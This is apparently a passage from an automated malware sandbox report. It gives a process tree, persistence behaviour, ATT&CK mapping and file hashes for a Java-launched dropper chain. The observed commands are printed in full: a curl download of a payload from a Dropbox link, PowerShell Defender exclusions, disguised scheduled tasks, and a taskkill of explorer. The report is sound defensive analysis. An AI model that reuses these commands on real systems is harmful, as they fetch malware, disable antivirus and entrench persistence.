Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4352 WINLOC~1.EXE -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 2612 Process not Found 5092 Process not Found 2480 Process not Found 3804 Process not Found 3176 Process not Found 4704 Process not Found 1672 Process not Found 3972 Process not Found 4572 Process not Found 3696 Process not Found 1804 Process not Found 872 Process not Found 1436 Process not Found 2708 Process not Found 4824 Process not Found 700 Process not Found 1920 Process not Found 4584 Process not Found 1696 Process not Found 4788 Process not Found 2768 Process not Found 3960 Process not Found 3984 Process not Found 1808 Process not Found 2700 Process not Found 1960 Process not Found 1128 Process not Found 1020 Process not Found 4080 Process not Found 1708 Process not Found 1416 Process not Found 1924 Process not Found 3008 Process not Found 2772 Process not Found 412 Process not Found 4820 Process not Found 4900 Process not Found 3936 Process not Found 1992 Process not Found 2112 Process not Found 3000 Process not Found 2888 Process not Found 4008 Process not Found 1848 Process not Found 2804 Process not Found 4064 Process not Found 2188 Process not Found 4056 Process not Found 1876 Process not Found 5020 Process not Found 1160 Process not Found 2080 Process not Found 1072 Process not Found 396 Process not Found 2508 Process not Found 3944 Process not Found 2260 Process not Found 32 Process not Found 4336 Process not Found 3896 Process not Found 3300 Process not Found 1360 Process not Found 4836 Process not Found 1908 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4820 WMIC.exe Token: SeSecurityPrivilege 4820 WMIC.exe Token: SeTakeOwnershipPrivilege 4820 WMIC.exe Token: SeLoadDriverPrivilege 4820 WMIC.exe Token: SeSystemProfilePrivilege 4820 WMIC.exe Token: SeSystemtimePrivilege 4820 WMIC.exe Token: SeProfSingleProcessPrivilege 4820 WMIC.exe Token: SeIncBasePriorityPrivilege 4820 WMIC.exe Token: SeCreatePagefilePrivilege 4820 WMIC.exe Token: SeBackupPrivilege 4820 WMIC.exe Token: SeRestorePrivilege 4820 WMIC.exe Token: SeShutdownPrivilege 4820 WMIC.exe Token: SeDebugPrivilege 4820 WMIC.exe Token: SeSystemEnvironmentPrivilege 4820 WMIC.exe Token: SeRemoteShutdownPrivilege 4820 WMIC.exe Token: SeUndockPrivilege 4820 WMIC.exe Token: SeManageVolumePrivilege 4820 WMIC.exe Token: 33 4820 WMIC.exe Token: 34 4820 WMIC.exe Token: 35 4820 WMIC.exe Token: 36 4820 WMIC.exe Token: SeIncreaseQuotaPrivilege 4820 WMIC.exe Token: SeSecurityPrivilege 4820 WMIC.exe Token: SeTakeOwnershipPrivilege 4820 WMIC.exe Token: SeLoadDriverPrivilege 4820 WMIC.exe Token: SeSystemProfilePrivilege 4820 WMIC.exe Token: SeSystemtimePrivilege 4820 WMIC.exe Token: SeProfSingleProcessPrivilege 4820 WMIC.exe Token: SeIncBasePriorityPrivilege 4820 WMIC.exe Token: SeCreatePagefilePrivilege 4820 WMIC.exe Token: SeBackupPrivilege 4820 WMIC.exe Token: SeRestorePrivilege 4820 WMIC.exe Token: SeShutdownPrivilege 4820 WMIC.exe Token: SeDebugPrivilege 4820 WMIC.exe Token: SeSystemEnvironmentPrivilege 4820 WMIC.exe Token: SeRemoteShutdownPrivilege 4820 WMIC.exe Token: SeUndockPrivilege 4820 WMIC.exe Token: SeManageVolumePrivilege 4820 WMIC.exe Token: 33 4820 WMIC.exe Token: 34 4820 WMIC.exe Token: 35 4820 WMIC.exe Token: 36 4820 WMIC.exe Token: SeIncreaseQuotaPrivilege 1116 WMIC.exe Token: SeSecurityPrivilege 1116 WMIC.exe Token: SeTakeOwnershipPrivilege 1116 WMIC.exe Token: SeLoadDriverPrivilege 1116 WMIC.exe Token: SeSystemProfilePrivilege 1116 WMIC.exe Token: SeSystemtimePrivilege 1116 WMIC.exe Token: SeProfSingleProcessPrivilege 1116 WMIC.exe Token: SeIncBasePriorityPrivilege 1116 WMIC.exe Token: SeCreatePagefilePrivilege 1116 WMIC.exe Token: SeBackupPrivilege 1116 WMIC.exe Token: SeRestorePrivilege 1116 WMIC.exe Token: SeShutdownPrivilege 1116 WMIC.exe Token: SeDebugPrivilege 1116 WMIC.exe Token: SeSystemEnvironmentPrivilege 1116 WMIC.exe Token: SeRemoteShutdownPrivilege 1116 WMIC.exe Token: SeUndockPrivilege 1116 WMIC.exe Token: SeManageVolumePrivilege 1116 WMIC.exe Token: 33 1116 WMIC.exe Token: 34 1116 WMIC.exe Token: 35 1116 WMIC.exe Token: 36 1116 WMIC.exe Token: SeIncreaseQuotaPrivilege 1116 WMIC.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 2768 java.exe 3916 javaw.exe 4884 Start.exe 2768 curl.exe 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 2720 LogonUI.exe 376 EXCEL.EXE 376 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3080 wrote to memory of 1808 3080 6812964531.exe 84 PID 3080 wrote to memory of 1808 3080 6812964531.exe 84 PID 1808 wrote to memory of 2768 1808 javaw.exe 99 PID 1808 wrote to memory of 2768 1808 javaw.exe 99 PID 2768 wrote to memory of 4700 2768 java.exe 101 PID 2768 wrote to memory of 4700 2768 java.exe 101 PID 4700 wrote to memory of 1088 4700 cmd.exe 103 PID 4700 wrote to memory of 1088 4700 cmd.exe 103 PID 2768 wrote to memory of 884 2768 java.exe 104 PID 2768 wrote to memory of 884 2768 java.exe 104 PID 884 wrote to memory of 1412 884 cmd.exe 106 PID 884 wrote to memory of 1412 884 cmd.exe 106 PID 2768 wrote to memory of 3916 2768 java.exe 107 PID 2768 wrote to memory of 3916 2768 java.exe 107 PID 3916 wrote to memory of 2512 3916 javaw.exe 108 PID 3916 wrote to memory of 2512 3916 javaw.exe 108 PID 2512 wrote to memory of 4820 2512 cmd.exe 110 PID 2512 wrote to memory of 4820 2512 cmd.exe 110 PID 3916 wrote to memory of 3572 3916 javaw.exe 111 PID 3916 wrote to memory of 3572 3916 javaw.exe 111 PID 3572 wrote to memory of 1116 3572 cmd.exe 113 PID 3572 wrote to memory of 1116 3572 cmd.exe 113 PID 3916 wrote to memory of 3456 3916 javaw.exe 127 PID 3916 wrote to memory of 3456 3916 javaw.exe 127 PID 3916 wrote to memory of 3456 3916 javaw.exe 127 PID 3456 wrote to memory of 4884 3456 3mb_online_install.exe 128 PID 3456 wrote to memory of 4884 3456 3mb_online_install.exe 128 PID 3456 wrote to memory of 4884 3456 3mb_online_install.exe 128 PID 4884 wrote to memory of 1268 4884 Start.exe 130 PID 4884 wrote to memory of 1268 4884 Start.exe 130 PID 1268 wrote to memory of 2768 1268 cmd.exe 132 PID 1268 wrote to memory of 2768 1268 cmd.exe 132 PID 3916 wrote to memory of 1784 3916 javaw.exe 134 PID 3916 wrote to memory of 1784 3916 javaw.exe 134 PID 3916 wrote to memory of 1784 3916 javaw.exe 134 PID 1784 wrote to memory of 388 1784 windef_installer.exe 135 PID 1784 wrote to memory of 388 1784 windef_installer.exe 135 PID 1784 wrote to memory of 388 1784 windef_installer.exe 135 PID 388 wrote to memory of 1116 388 windef_installer.exe 136 PID 388 wrote to memory of 1116 388 windef_installer.exe 136 PID 388 wrote to memory of 1116 388 windef_installer.exe 136 PID 1116 wrote to memory of 4352 1116 svchost.com 137 PID 1116 wrote to memory of 4352 1116 svchost.com 137 PID 1116 wrote to memory of 4352 1116 svchost.com 137 PID 4352 wrote to memory of 4104 4352 WINLOC~1.EXE 157 PID 4352 wrote to memory of 4104 4352 WINLOC~1.EXE 157 PID 4352 wrote to memory of 4104 4352 WINLOC~1.EXE 157 PID 4104 wrote to memory of 3964 4104 cmd.exe 141 PID 4104 wrote to memory of 3964 4104 cmd.exe 141 PID 4104 wrote to memory of 3964 4104 cmd.exe 141 PID 3948 wrote to memory of 3164 3948 javaw.exe 143 PID 3948 wrote to memory of 3164 3948 javaw.exe 143 PID 3164 wrote to memory of 1096 3164 cmd.exe 145 PID 3164 wrote to memory of 1096 3164 cmd.exe 145 PID 3948 wrote to memory of 4340 3948 javaw.exe 146 PID 3948 wrote to memory of 4340 3948 javaw.exe 146 PID 4340 wrote to memory of 4568 4340 cmd.exe 148 PID 4340 wrote to memory of 4568 4340 cmd.exe 148 PID 3916 wrote to memory of 1800 3916 javaw.exe 149 PID 3916 wrote to memory of 1800 3916 javaw.exe 149 PID 3916 wrote to memory of 1800 3916 javaw.exe 149 PID 1800 wrote to memory of 2772 1800 svchost.com 150 PID 1800 wrote to memory of 2772 1800 svchost.com 150 PID 1800 wrote to memory of 2772 1800 svchost.com 150 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6812964531.exe"C:\Users\Admin\AppData\Local\Temp\6812964531.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\6812964531.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Program Files\Java\jre-1.8\bin\java.exejava -jar C:\Users\Admin\download_libra.jar3⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SYSTEM32\cmd.execmd.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"5⤵PID:1088
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c SCHTASKS /CREATE /F /SC MINUTE /TN OneDrive\OneDriveUpdateTask /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar4⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\schtasks.exeSCHTASKS /CREATE /F /SC MINUTE /TN OneDrive\OneDriveUpdateTask /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar5⤵
- Scheduled Task/Job: Scheduled Task
PID:1412
-
-
-
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar"4⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SYSTEM32\cmd.execmd /c wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List5⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c wmic cpu get name5⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
-
C:\Users\Admin\AppData\Local\Temp\3mb_online_install.exe"C:\Users\Admin\AppData\Local\Temp\3mb_online_install.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\ProgramData\Drivers\Start.exe"C:\ProgramData\Drivers\Start.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F62E.tmp\F62F.tmp\F630.bat C:\ProgramData\Drivers\Start.exe"7⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\ProgramData\Drivers\curl.exeC:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2768
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef_installer.exe"C:\Users\Admin\AppData\Local\Temp\windef_installer.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\3582-490\windef_installer.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\windef_installer.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\WINLOC~1.EXE"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\WINLOC~1.EXEC:\Users\Admin\AppData\Local\Temp\WINLOC~1.EXE8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "TASKKILL /F /IM "explorer.exe""9⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\taskkill.exeTASKKILL /F /IM "explorer.exe"10⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3964
-
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\MINECR~1.EXE"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\MINECR~1.EXEC:\Users\Admin\AppData\Local\Temp\MINECR~1.EXE6⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\._cache_MINECR~1.EXE"C:\Users\Admin\AppData\Local\Temp\._cache_MINECR~1.EXE"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4680 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\MsAgentBrowserdhcp\RJohyDXhI3BukXB8LZtFph4xzxsRiCFy2OHMYmU5wvokqlpzCh.vbe"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\MsAgentBrowserdhcp\6tdiKxJ4vs339LB2ENkEUF6gwXbV.bat" "9⤵
- System Location Discovery: System Language Discovery
PID:1396 -
C:\MsAgentBrowserdhcp\Bridgesurrogate.exe"C:\MsAgentBrowserdhcp/Bridgesurrogate.exe"10⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4748 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4nqa3qma\4nqa3qma.cmdline"11⤵
- Drops file in System32 directory
PID:3180 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A18.tmp" "c:\Windows\System32\CSC470AB7F9C71A401BBF66E6B365D2F620.TMP"12⤵PID:4680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\uk-UA\winlogon.exe'11⤵
- Command and Scripting Interpreter: PowerShell
PID:3604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\Bridgesurrogate.exe'11⤵
- Command and Scripting Interpreter: PowerShell
PID:4648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsAgentBrowserdhcp\taskhostw.exe'11⤵
- Command and Scripting Interpreter: PowerShell
PID:224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\Bridgesurrogate.exe'11⤵
- Command and Scripting Interpreter: PowerShell
PID:3060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\de-DE\csrss.exe'11⤵
- Command and Scripting Interpreter: PowerShell
PID:3860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsAgentBrowserdhcp\Bridgesurrogate.exe'11⤵
- Command and Scripting Interpreter: PowerShell
PID:4984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yXvG37C0SW.bat"11⤵PID:1416
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:3196
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:212⤵PID:4468
-
-
C:\Program Files\Windows Defender\uk-UA\winlogon.exe"C:\Program Files\Windows Defender\uk-UA\winlogon.exe"12⤵
- Executes dropped EXE
PID:4924
-
-
-
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:528 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate8⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4060 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\MsAgentBrowserdhcp\RJohyDXhI3BukXB8LZtFph4xzxsRiCFy2OHMYmU5wvokqlpzCh.vbe"9⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\MsAgentBrowserdhcp\6tdiKxJ4vs339LB2ENkEUF6gwXbV.bat" "10⤵
- System Location Discovery: System Language Discovery
PID:3984 -
C:\MsAgentBrowserdhcp\Bridgesurrogate.exe"C:\MsAgentBrowserdhcp/Bridgesurrogate.exe"11⤵
- Executes dropped EXE
PID:4788
-
-
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\cheats.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\cheats.exeC:\Users\Admin\AppData\Local\Temp\cheats.exe6⤵
- Executes dropped EXE
PID:4704
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\cheat.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4876 -
C:\Users\Admin\AppData\Local\Temp\cheat.exeC:\Users\Admin\AppData\Local\Temp\cheat.exe6⤵
- Executes dropped EXE
PID:4080 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵PID:4104
-
-
-
-
C:\Windows\SYSTEM32\shutdown.exeshutdown /l5⤵PID:3256
-
-
-
-
-
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar"1⤵PID:4780
-
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\system32\cmd.execmd /c wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List2⤵
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵PID:1096
-
-
-
C:\Windows\system32\cmd.execmd /c wmic cpu get name2⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵PID:4568
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x51c 0x5181⤵PID:1152
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:376
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\uk-UA\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4272
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\uk-UA\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender\uk-UA\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BridgesurrogateB" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\Bridgesurrogate.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Bridgesurrogate" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\Bridgesurrogate.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BridgesurrogateB" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\Bridgesurrogate.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1652
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\MsAgentBrowserdhcp\taskhostw.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3968
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\MsAgentBrowserdhcp\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\MsAgentBrowserdhcp\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BridgesurrogateB" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\Bridgesurrogate.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Bridgesurrogate" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\Bridgesurrogate.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2604
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BridgesurrogateB" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\Bridgesurrogate.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\de-DE\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\de-DE\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\de-DE\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BridgesurrogateB" /sc MINUTE /mo 12 /tr "'C:\MsAgentBrowserdhcp\Bridgesurrogate.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Bridgesurrogate" /sc ONLOGON /tr "'C:\MsAgentBrowserdhcp\Bridgesurrogate.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BridgesurrogateB" /sc MINUTE /mo 12 /tr "'C:\MsAgentBrowserdhcp\Bridgesurrogate.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4468
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3893055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2720
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000a4 000000841⤵PID:3256
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
328KB
MD539c8a4c2c3984b64b701b85cb724533b
SHA1c911f4c4070dfe9a35d9adcb7de6e6fb1482ce00
SHA256888a1dd0033e5d758a4e731e3e55357de866e80d03b1b194375f714e1fd4351d
SHA512f42ca2962fe60cff1a13dea8b81ff0647b317c785ee4f5159c38487c34d33aecba8478757047d31ab2ee893fbdcb91a21655353456ba6a018fc71b2278db4db2
-
Filesize
86KB
MD53b73078a714bf61d1c19ebc3afc0e454
SHA19abeabd74613a2f533e2244c9ee6f967188e4e7e
SHA256ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29
SHA51275959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4
-
Filesize
5.7MB
MD509acdc5bbec5a47e8ae47f4a348541e2
SHA1658f64967b2a9372c1c0bdd59c6fb2a18301d891
SHA2561b5c715d71384f043843ea1785a6873a9f39d2daae112ccdeffcd88b10a3a403
SHA5123867bf98e1a0e253114a98b78b047b0d8282b5abf4aaf836f31cc0e26224e2a1b802c65df9d90dc7696a6dbcb9a8e4b900f1d1299e1b11e36f095ebaf8a2e5b8
-
Filesize
175KB
